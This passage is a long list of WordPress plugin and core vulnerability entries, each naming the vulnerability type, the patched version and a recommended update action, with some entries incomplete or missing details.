Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Photo Gallery by 10Web – Mobile-Friendly Image Gallery

Vulnerability: Unauthenticated Blind SQL Injection via order_by Parameter
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: myEASYbackup

Vulnerability: Directory Traversal
Patched Version: 1.0.9
Recommended Action: Update to version 1.0.9, or a newer patched version

Plugin: Simple:Press Forum

Vulnerability: Reflected Cross-Site Scripting via Cookie Value
Patched Version: 6.8.1
Recommended Action: Update to version 6.8.1, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Missing Authorization
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: Genesis Simple Love

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.1
Recommended Action: Update to version 3.2.1, or a newer patched version

Plugin: Mail Subscribe List

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via smlsubform shortcode
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: Authenticated (Shop Manager+) Arbitrary File Upload
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: KB Support – Customer Support Ticket & Helpdesk Plugin, Knowledge Base Plugin

Vulnerability: Missing Authorization to Authenticated (Subscriber+) User Data Retrieval
Patched Version: 1.5.89
Recommended Action: Update to version 1.5.89, or a newer patched version

Plugin: WP SEO Redirect 301

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.3.2
Recommended Action: Update to version 2.3.2, or a newer patched version

Plugin: Generate Images (AI) – Magic Post Thumbnail

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3.7
Recommended Action: Update to version 3.3.7, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Cross-Site Request Forgery to Menu Template creation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: WP Word Count

Vulnerability: Missing Authorization via calculate_statistics
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Speed Optimization By Add Expires Headers & Optimized Minify Plugin

Vulnerability: Cross-Site Request Forgery via [placeholder]
Patched Version: 2.7.1
Recommended Action: Update to version 2.7.1, or a newer patched version

Plugin: WP User Merger

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: FormCraft – Form Builder

Vulnerability: SQL Injection via id Parameter
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: reCAPTCHA

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Plugin Activation
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Premium Courses & eLearning with Paid Memberships Pro for LearnDash, LifterLMS, Sensei LMS & TutorLMS

Vulnerability: Courses for Membership Add On <= 1.2.4
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Simple Video Embedder

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.2
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: gistpress

Vulnerability: Cross-Site Scripting
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: IRivYou – Import reviews from AliExpress and Amazon to woocommerce

Vulnerability: Cross-Site Request Forgery via saveOptionsReviewsPlugin
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Membership

Vulnerability: Privilege Escalation
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Media from FTP

Vulnerability: Directory Traversal
Patched Version: 9.85
Recommended Action: Update to version 9.85, or a newer patched version

Plugin: Hide My WP Ghost – Security & Firewall

Vulnerability: CAPTCHA Bypass in brute_math_authenticate
Patched Version: 5.0.26
Recommended Action: Update to version 5.0.26, or a newer patched version

Plugin: WP Google Fonts

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.5
Recommended Action: Update to version 3.1.5, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.0.18
Recommended Action: Update to version 2.0.18, or a newer patched version

Plugin: Custom Share Buttons with Floating Sidebar

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Plugin: Web To Print Shop : uDraw

Vulnerability: Unauthenticated Arbitrary File Access
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Abandoned Cart Lite for WooCommerce

Vulnerability: SQL Injection
Patched Version: 5.8.3
Recommended Action: Update to version 5.8.3, or a newer patched version

Plugin: Easy Registration Forms

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Sensitive Data Exposure
Patched Version: 4.25
Recommended Action: Update to version 4.25, or a newer patched version

Plugin: HREFLANG Tags Lite

Vulnerability: Missing Authorization to Data Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode Addons- with Visual Composer, Divi, Beaver Builder and Elementor Extension

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: Max Mega Menu

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Simple Job Board

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.4
Recommended Action: Update to version 2.4.4, or a newer patched version

Plugin: Widgets for WooCommerce Products on Elementor

Vulnerability: Authenticated (Contributor+) Stored Cross Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Translate WordPress – Google Language Translator

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 6.0.10
Recommended Action: Update to version 6.0.10, or a newer patched version

Plugin: Ovic Product Bundle

Plugin: Tree Sitemap (Pages, Posts & Categories list)

Vulnerability: Cross-Site Request Forgery to Arbitrary Plugin Installation/Activation
Patched Version: 3.1
Recommended Action: Update to version 3.1, or a newer patched version

Plugin: Smart Slider 3

Vulnerability: PHP Object Injection
Patched Version: 3.5.1.11
Recommended Action: Update to version 3.5.1.11, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated Arbitrary Options Update
Patched Version: 2.7.3
Recommended Action: Update to version 2.7.3, or a newer patched version

Plugin: UsersWP – Front-end login form, User Registration, User Profile & Members Directory plugin for WP

Vulnerability: Authenticated (Administrator+) CSV Injection
Patched Version: 1.2.3.10
Recommended Action: Update to version 1.2.3.10, or a newer patched version

Plugin: WP Customer Area

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.2.3
Recommended Action: Update to version 8.2.3, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: User Login Log

Plugin: WP Catalogue

Plugin: Starter Templates — Elementor, WordPress & Beaver Builder Templates

Vulnerability: Cross-Site Request Forgery in add_to_favorite
Patched Version: 3.2.21
Recommended Action: Update to version 3.2.21, or a newer patched version

Plugin: Hostel

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: WooCommerce

Vulnerability: Cross-site Scripting
Patched Version: 2.4.9
Recommended Action: Update to version 2.4.9, or a newer patched version

Plugin: For the visually impaired

Vulnerability: Cross-Site Request Forgery to Plugin Settings Changes
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ready! Coming Soon

Vulnerability: No subtitle
Patched Version: 0.5.1
Recommended Action: Update to version 0.5.1, or a newer patched version

Plugin: Void Contact Form 7 Widget For Elementor Page Builder

Vulnerability: Cross-Site Request Forgery in void_cf7_opt_in_user_data_track
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Plugin: Easy Digital Downloads – eCommerce Payments and Subscriptions made easy

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.11.2.1
Recommended Action: Update to version 2.11.2.1, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Missing Authorization in ‘wpfc_preload_single_callback’
Patched Version: 1.1.3
Recommended Action: Update to version 1.1.3, or a newer patched version

Plugin: eCommerce Product Catalog Plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.72
Recommended Action: Update to version 3.0.72, or a newer patched version

Plugin: Democracy Poll

Vulnerability: Cross-Site Scripting
Patched Version: 5.4
Recommended Action: Update to version 5.4, or a newer patched version

Plugin: My WP Translate

Vulnerability: Unprotected AJAX Actions
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Libsyn Publisher Hub

Plugin: Helpful

Vulnerability: Sensitive Information Disclosure
Patched Version: 4.5.26
Recommended Action: Update to version 4.5.26, or a newer patched version

Plugin: FV Flowplayer Video Player

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.5.31.7212
Recommended Action: Update to version 7.5.31.7212, or a newer patched version

Plugin: Launcher: Coming Soon & Maintenance Mode

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.0.11
Recommended Action: Update to version 1.0.11, or a newer patched version

Plugin: WP-reCAPTCHA

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: iTwitter

Plugin: Media Tags

Plugin: React Webcam

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Dashboard – Custom WordPress Dashboard

Vulnerability: Login Page Disclosure on Multi-site
Patched Version: 3.7.11
Recommended Action: Update to version 3.7.11, or a newer patched version

Plugin: Admin Menu Editor

Plugin: Multi Feed Reader

Vulnerability: Authenticated SQL Injection
Patched Version: 2.2.4
Recommended Action: Update to version 2.2.4, or a newer patched version

Plugin: Data Tables Generator by Supsystic

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 1.9.92
Recommended Action: Update to version 1.9.92, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Cross-Site Request Forgery
Patched Version: 4.4.5
Recommended Action: Update to version 4.4.5, or a newer patched version

Plugin: User Email Verification for WooCommerce

Vulnerability: Unauthenticated Arbitrary Options Update
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Elementor Website Builder Pro

Vulnerability: Authenticated(Subscriber+) Privilege Escalation via update_page_option
Patched Version: 3.11.7
Recommended Action: Update to version 3.11.7, or a newer patched version

Plugin: Accordion

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.30
Recommended Action: Update to version 2.2.30, or a newer patched version

Plugin: Files Download Delay

Vulnerability: Missing Authorization to Settings Reset
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: Motors – Car Dealer, Classifieds & Listing

Vulnerability: Unauthenticated Settings Import/Export
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: WooCommerce Shipping & Tax

Vulnerability: Stored Cross-Site Scripting
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Post Title Counter

Plugin: Stockdio Historical Chart

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.1
Recommended Action: Update to version 2.8.1, or a newer patched version

Plugin: Weaver Xtreme Theme Support

Vulnerability: Authenticated (Administrator+) PHP Object Injection via Imported File
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: mywebcounter

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Information Disclosure via REST API
Patched Version: 6.0.4.1
Recommended Action: Update to version 6.0.4.1, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.7.12
Recommended Action: Update to version 2.7.12, or a newer patched version

Plugin: Product Vendors

Vulnerability: Insecure Direct Object Reference to Note Creation
Patched Version: 2.1.66
Recommended Action: Update to version 2.1.66, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Broken Password Mechanism
Patched Version: 7.7.0
Recommended Action: Update to version 7.7.0, or a newer patched version

Plugin: Appointment Booking Calendar Plugin and Scheduling Plugin – BookingPress

Vulnerability: SQL Injection
Patched Version: 1.0.14
Recommended Action: Update to version 1.0.14, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: 3.1.3
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: AllWebMenus WordPress Menu Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: Chronosly Events Calendar

Vulnerability: Cross-Site Request Forgery via plugin_settings_page
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Apollo13 Framework Extensions

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.2
Recommended Action: Update to version 1.9.2, or a newer patched version

Plugin: Super Forms – Drag & Drop Form Builder

Vulnerability: Arbitrary File Upload
Patched Version: 4.9.800
Recommended Action: Update to version 4.9.800, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via example.html
Patched Version: 3.7.8
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.8, 3.8.8, 3.9.6, 4.0.5, 4.1.5, 4.2.2

Plugin: Membership Simplified

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 4.19.3
Recommended Action: Update to version 4.19.3, or a newer patched version

Plugin: GoodBarber

Vulnerability: Cross-Site Request Forgery via admin_options
Patched Version: 1.0.24
Recommended Action: Update to version 1.0.24, or a newer patched version

Plugin: Go Pricing – WordPress Responsive Pricing Tables

Vulnerability: WordPress Responsive Pricing Tables <= 3.3.19
Patched Version: 3.4
Recommended Action: Update to version 3.4, or a newer patched version

Plugin: EventON Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.0.6
Recommended Action: Update to version 3.0.6, or a newer patched version

Plugin: Map Multi Marker

Plugin: Unite Gallery Lite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.7.62
Recommended Action: Update to version 1.7.62, or a newer patched version

Plugin: Canto

Vulnerability: Blind Server-Side Request Forgery via detail.php
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: AnyWhere Elementor

Vulnerability: Sensitive Information Exposure
Patched Version: 1.2.8
Recommended Action: Update to version 1.2.8, or a newer patched version

Plugin: Image Slider

Vulnerability: Arbitrary File Deletion
Patched Version: 1.1.90
Recommended Action: Update to version 1.1.90, or a newer patched version

Plugin: Comments Ratings

Core: WordPress

Vulnerability: Cross-Site Request Forgery via Press This
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Database Sync

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 0.5
Recommended Action: Update to version 0.5, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: Seed Fonts

Vulnerability: Authenticated(Administrator+) Stored Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: Admin+ SQL Injection
Patched Version: 5.2.11
Recommended Action: Update to version 5.2.11, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Request Forgery leading to Settings Updates
Patched Version: 15.0.5
Recommended Action: Update to version 15.0.5, or a newer patched version

Plugin: Awesome Support – WordPress HelpDesk & Support Plugin

Vulnerability: Cross-Site Request Forgery via wpas_edit_reply_ajax()
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: WPBakery Page Builder Clipboard

Vulnerability: Arbitrary License Options Update
Patched Version: 4.5.8
Recommended Action: Update to version 4.5.8, or a newer patched version

Plugin: Useful Banner Manager

Plugin: Postie

Vulnerability: Post Submission Spoofing & Stored Cross-Site Scripting
Patched Version: 1.9.41
Recommended Action: Update to version 1.9.41, or a newer patched version

Plugin: WordPress Social Invitations – Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.4.3
Recommended Action: Update to version 1.4.4.3, or a newer patched version

Plugin: RokNewsPager

Vulnerability: Arbitrary File Upload
Patched Version: 1.18
Recommended Action: Update to version 1.18, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Unauthenticated Sensitive Information Exposure via ai_ajax
Patched Version: 2.7.31
Recommended Action: Update to version 2.7.31, or a newer patched version

Plugin: Widgets on Pages

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: User Activity Log

Vulnerability: Reflected Cross Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: bbPress

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 2.6.5
Recommended Action: Update to version 2.6.5, or a newer patched version

Plugin: Zoho CRM Lead Magnet

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
Patched Version: 1.7.5.9
Recommended Action: Update to version 1.7.5.9, or a newer patched version

Plugin: Hustle – Email Marketing, Lead Generation, Optins, Popups

Vulnerability: Unauthenticated CSV Injection
Patched Version: 6.0.8.1
Recommended Action: Update to version 6.0.8.1, or a newer patched version

Plugin: Yet Another bol.com Plugin

Vulnerability: <= 1.4
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Conditional Menus

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: AskApache Firefox Adsense

Plugin: Easy Event calendar

Plugin: SlickQuiz

Plugin: Zoho Forms – Drag & Drop Form Builder for Websites – Contact Forms, Payment Forms, Order Forms & More

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: CUBE SLIDER

Plugin: WP-Invoice – Web Invoice and Billing

Vulnerability: Insecure Direct Object Reference
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Fileviewer

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 3.0.2
Recommended Action: Update to version 3.0.2, or a newer patched version

Plugin: Direct Download for Woocommerce

Vulnerability: Local File Inclusion
Patched Version: 1.16
Recommended Action: Update to version 1.16, or a newer patched version

Plugin: Zarzadzanie Kontem

Plugin: IdeaPush

Vulnerability: Missing Authorization
Patched Version: 8.58
Recommended Action: Update to version 8.58, or a newer patched version

Plugin: WordPress RokBox

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: Cross-Site Scripting
Patched Version: 2.72
Recommended Action: Update to version 2.72, or a newer patched version

Plugin: DZS Video Gallery

Vulnerability: Limited Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Deserialization Gadget
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Enable SVG Uploads

Plugin: User Registration & Membership – Custom Registration Form, Login Form, and User Profile

Vulnerability: PHP Object Injection
Patched Version: 2.3.3
Recommended Action: Update to version 2.3.3, or a newer patched version

Plugin: S3 Video Plugin

Plugin: WP Forms Puzzle Captcha

Vulnerability: Captcha Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Download Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Cross-Site Request Forgery and Cross-Site Scripting
Patched Version: 4.57
Recommended Action: Update to version 4.57, or a newer patched version

Plugin: Jayj Quicktag

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Calendar WD version

Vulnerability: Authenticated Cross-Site Scripting
Patched Version: 1.0.94
Recommended Action: Update to version 1.0.94, or a newer patched version

Plugin: Easy Google Maps

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.10.1
Recommended Action: Update to version 1.10.1, or a newer patched version

Plugin: Dropdown and scrollable Text

Vulnerability: No subtitle
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: Fancy Cats

Plugin: UnGallery

Vulnerability: Command Injection
Patched Version: 2.1.6
Recommended Action: Update to version 2.1.6, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Authentication Bypass
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Spectra – WordPress Gutenberg Blocks

Vulnerability: Authenticated (Contributor+) Server-Side Request Forgery in import_wpforms
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Use Any Font | Custom Font Uploader

Vulnerability: Cross-Site Scripting
Patched Version: 6.2.8
Recommended Action: Update to version 6.2.8, or a newer patched version

Plugin: WP e-Commerce – Store Toolkit

Vulnerability: Missing Authorization
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: FlipBook

Plugin: eBay Dropshipping and Affiliate by Wooshark

Vulnerability: Unprotected AJAX Actions
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Shortcodes Plugin — Shortcodes Ultimate

Vulnerability: Directory Traversal
Patched Version: 4.10.0
Recommended Action: Update to version 4.10.0, or a newer patched version

Plugin: School Management System – WPSchoolPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.1.10
Recommended Action: Update to version 2.1.10, or a newer patched version

Plugin: Annual Archive

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: Broken Link Checker

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.11.9
Recommended Action: Update to version 1.11.9, or a newer patched version

Plugin: WP Customize Login

Plugin: WPFront Notification Bar

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.0.0
Recommended Action: Update to version 2.0.0, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Reflected Cross-Site Scripting via updraft_restore
Patched Version: 1.16.69
Recommended Action: Update to version 1.16.69, or a newer patched version

Plugin: Wordfence Security – Firewall, Malware Scan, and Login Security

Vulnerability: Cross-Site Scripting
Patched Version: 5.1.4
Recommended Action: Update to version 5.1.4, or a newer patched version

Plugin: Sticky Social Media Icons

Vulnerability: Missing Authorization via ajax_request_handle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BEAR – Bulk Editor and Products Manager Professional for WooCommerce by Pluginus.Net

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.1.4
Recommended Action: Update to version 1.1.4, or a newer patched version

Plugin: Maps Plugin using Google Maps for WordPress – WP Google Map

Vulnerability: Missing Authorization
Patched Version: 1.8.1
Recommended Action: Update to version 1.8.1, or a newer patched version

Plugin: SEUR Oficial

Vulnerability: Authenticated Arbitrary File Download
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Core: WordPress

Vulnerability: Path Traversal and Local File Inclusion
Patched Version: 5.0.3
Recommended Action: Update to version 5.0.3, or a newer patched version

Plugin: Loginizer

Vulnerability: SQL Injection
Patched Version: 1.6.4
Recommended Action: Update to version 1.6.4, or a newer patched version

Plugin: RK Responsive Contact Form

Plugin: RokIntroScroller

Vulnerability: Full Path Disclosure
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: JobSearch WP Job Board

Vulnerability: Missing Authorization to Settings Change
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Coming Soon & Maintenance Mode Page & Under Construction

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Relevanssi – A Better Search

Vulnerability: Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: WordPress Flipbook by Supsystic

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: WP-Filebase

Vulnerability: Remote Code Execution
Patched Version: 0.3.0.04
Recommended Action: Update to version 0.3.0.04, or a newer patched version

Plugin: Flexible Woocommerce Checkout Field Editor

Plugin: JetBackup – WP Backup, Migrate & Restore

Vulnerability: Missing Authorization to Unauthorized Backup Location Change
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: wp-spamfree

Plugin: InstaWP Connect – 1-click WP Staging & Migration

Vulnerability: Cross-Site Request Forgery via create_file_db_manager
Patched Version: 0.1.0.9
Recommended Action: Update to version 0.1.0.9, or a newer patched version

Plugin: Rucy

Plugin: Loginizer

Vulnerability: Blind SQL Injection
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Gutenberg Forms – WordPress Form Builder Plugin

Vulnerability: Authenticated(Subscriber+) Sensitive Information Disclosure
Patched Version: 2.2.9
Recommended Action: Update to version 2.2.9, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Cross-Site Request Forgery via page to wpfastestcacheoptions
Patched Version: 0.8.8.6
Recommended Action: Update to version 0.8.8.6, or a newer patched version

Plugin: Export and Import Users and Customers

Vulnerability: CSV Injection
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Skysa App Bar Integration

Vulnerability: Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Ocean Extra

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 2.1.3
Recommended Action: Update to version 2.1.3, or a newer patched version

Plugin: Staff Directory Plugin: Company Directory

Vulnerability: Cross-Site Request Forgery Bypass
Patched Version: 4.0
Recommended Action: Update to version 4.0, or a newer patched version

Plugin: SIS Handball

Plugin: itemprop WP for SERP/SEO Rich snippets

Plugin: Payment Gateway Per Product for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.2.8
Recommended Action: Update to version 3.2.8, or a newer patched version

Plugin: Paid Memberships Pro – Content Restriction, User Registration, & Paid Subscriptions

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.12.4
Recommended Action: Update to version 2.12.4, or a newer patched version

Plugin: UpdraftPlus: WP Backup & Migration Plugin

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via action_authenticate_storage
Patched Version: 1.23.4
Recommended Action: Update to version 1.23.4, or a newer patched version

Plugin: Video Contest WordPress Plugin

Plugin: CTT Expresso para WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.2.12
Recommended Action: Update to version 3.2.12, or a newer patched version

Plugin: Post Teaser

Plugin: breadcrumb simple

